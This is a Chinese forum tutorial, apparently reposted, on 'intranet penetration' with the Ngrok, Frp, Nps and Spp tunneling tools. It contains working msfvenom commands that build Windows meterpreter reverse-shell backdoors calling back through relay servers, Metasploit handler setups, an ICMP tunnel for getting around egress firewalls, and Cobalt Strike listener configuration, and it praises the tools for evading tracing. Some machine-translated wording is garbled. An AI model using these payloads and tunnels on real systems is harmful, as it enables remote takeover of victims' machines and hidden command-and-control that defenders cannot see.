ToB企服应用市场:ToB评测及商务社交产业平台

标题: 内网安全:内网穿透详解 [打印本页]

作者: 羊蹓狼    时间: 2024-6-21 13:43
标题: 内网安全:内网穿透详解
目次
内网穿透技能
内网穿透原理
实验环境
内网穿透项目
内网穿透:Ngrok
配置服务端
客户端配置
客户端天生后门,等待目标上线
内网穿透:Frp
客户端服务端建立毗连
MSF天生后门,等待上线
内网穿透:Nps
服务端搭建配置
客户端配置
MSF天生后门上线
内网穿透:Spp
服务端
客户端
CS配置
总结:内网穿透技能解决了和内网主机毗连的问题





内网穿透技能

这个技能可以解决的问题:


内网穿透原理

内网穿透(NAT traversal)是一种技能,用于实现公网与内网之间的通讯毗连。当内网中的设备无法直接从公网访问时,内网穿透技能可以通过一些本领,让公网上的设备能够穿透到内网中的设备,建立起通讯毗连。
内网穿透的原理可以简朴描述如下:

实验环境

目标:xiaodi8.com上线Kali的CS

正向毗连:Kali主动毗连xiaodi8.com,可行
反向毗连:xiaodi8.com毗连Kali,不可行
为了解决反向毗连的问题,须要使用内网穿透技能,实现外部主机毗连进入内网。这就是内网技能的意义所在。

内网穿透项目

一样寻常使用工具项目摆设,穿透项目:Ngrok,Frp,Spp,Nps,EW(克制更新,不再维护,不保举)
  1. https://www.ngrok.cc
  2. https://github.com/esrrhs/spp
  3. https://github.com/fatedier/frp
  4. https://github.com/ehang-io/nps
  5. http://www.rootkiter.com/EarthWorm
复制代码
优点:穿透加密数据,中间平台,防追踪,解决网络问题


内网穿透:Ngrok

项目地点:内网转发
免费版:仅支持三种协议,http,https,tcp

配置服务端

开通隧道,设置Kali内网IP,Port,以及服务器开放的端口



客户端配置

Kali实行客户端,这个过程相当于Kali主动毗连域名
  1. ./sunny clientid 203828291918
复制代码



客户端天生后门,等待目标上线

天生木马
  1. msfvenom -p windows/meterpreter/reverse_tcp lhost=free.idcfengye.com lport=10039 -f exe -o tcp.exe
复制代码
开启监听
  1. use exploit/multi/handler
  2. set payload windows/meterpreter/reverse_tcp
  3. set lhost 0.0.0.0
  4. set lport 2233
  5. run
复制代码
目标上线



内网穿透:Frp

项目地点:https://github.com/fatedier/frp
须要一台服务器
frp是一个专注于内网穿透的高性能的反向署理应用,支持TCP、UDP、HTTP、HTTPS 等多种协议。可以将内网服务以安全、便捷的方式通过具有公网IP节点的中转袒露到公网。

客户端服务端建立毗连

服务端
服务器修改配置文件frps.ini 隧道建立绑定在7000端口
  1. [common] bind_port = 7000
复制代码
启动服务端
  1. ./frps -c ./frps.ini
复制代码


 客户端
修改配置文件frpc.ini   
隧道建立绑定在7000端口
服务端的6000端口受到数据会自动转发到本地的5555端口
  1. [common]
  2. server_addr = 47.94.236.117
  3. server_port = 7000
  4. [msf]
  5. type=tcp
  6. local_ip=127.0.0.1
  7. local_port=5555
  8. remote_port=6000
复制代码
启动客户端
  1. ./frpc -c ./frpc.ini
复制代码

客户端与服务端建立毗连

MSF天生后门,等待上线

天生后门
  1. msfvenom -p windows/meterpreter/reverse_tcp lhost=47.94.236.117 lport=6000 -f exe -o frp.exe
复制代码
开启监听
  1. use exploit/multi/handler
  2. set payload windows/meterpreter/reverse_tcp
  3. set LHOST 127.0.0.1
  4. set LPORT 5555
  5. exploit
复制代码
上线



内网穿透:Nps

相当于服务端搭建一个ngrok
项目地点:https://github.com/ehang-io/nps
下载项目到服务器,它有一个客户端,一个服务端
nps是一款轻量级、高性能、功能强盛的内网穿透署理服务器。目前支持tcp、udp流量转发,可支持任何tcp、udp上层协议(访问内网网站、本地付出接口调试、ssh访问、远程桌面,内网dns剖析等等……),此外还支持内网http署理、内网socks5署理、p2p等,并带有功能强盛的web管理端。
 
服务端搭建配置

安装nps
  1. ./nps install
复制代码
运行nps
  1. ./nps
复制代码
  默认运行地点
  http://IP:8080/
  默认登录账号暗码
  admin/123
  创建客户端,天生密匙

添加协议隧道,绑定指向
将访问服务器5566端口的流量发送至客户端的6666端口



客户端配置

毗连服务端
  1. ./npc -server=47.94.236.117:8024 -vkey=uajwhbu9155qh89v  #创建客户端后自动生成密钥
复制代码


MSF天生后门上线

天生后门
  1. msfvenom -p windows/meterpreter/reverse_tcp lhost=47.94.236.117 lport=5566 -f exe -o nps.exe
复制代码
监听本地6666
  1. use exploit/multi/handler
  2. set payload windows/meterpreter/reverse_tcp
  3. set LHOST 0.0.0.0
  4. set LPORT 6666
  5. run
复制代码
上线




内网穿透:Spp

项目地点:GitHub - esrrhs/spp: A simple and powerful proxy
支持的协议:tcp、udp、udp、icmp、http、kcp、quic
支持的范例:正向署理、反向署理、socks5正向署理、socks5反向署理
在对抗项目中有遇到过一些极端环境,好比目标封了tcp,http等常用出网的协议,但是icmp,dns等协议可能由于业务须要或者管理者安全意识不到位导致没有封干净。
在这种场景下就可以使用这些容易被忽视的协议举行隧道的搭建。

服务端

服务端运行,监听本地的ICMP流量
  1. ./spp -type server -proto ricmp -listen 0.0.0.0
复制代码


客户端

受控靶机运行,将本地5555端口流量转发至47.94.236.117 80端口上(TCP封装成ICMP)
  1. spp -name “test” -type proxy_client -server 47.94.236.117 -fromaddr :5555 -toaddr :80 -proxyproto tcp -proto ricmp
复制代码
服务端收到数据



CS配置

这个CS是运行在服务端的
创建两个监听器:
监听器1:http 47.94.236.117 8081

 
监听器2:http 127.0.0.1 8082 天生后门放到靶机上实行


上线,天生监听器2的木马,上线监听器1



总结:内网穿透技能解决了和内网主机毗连的问题

区别于署理技能,隧道技能,三种技能都有解决通讯的问题,但是侧重不一样
署理技能可以把外网攻击机带进内网举行渗出
隧道技能解决了由于防火墙限制流量不出网的问题
内网穿透解决和内网主机建立毗连的问题,可以远程访问内网的服务器
要根据不同使用场景来选择使用。


免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。




欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/) Powered by Discuz! X3.4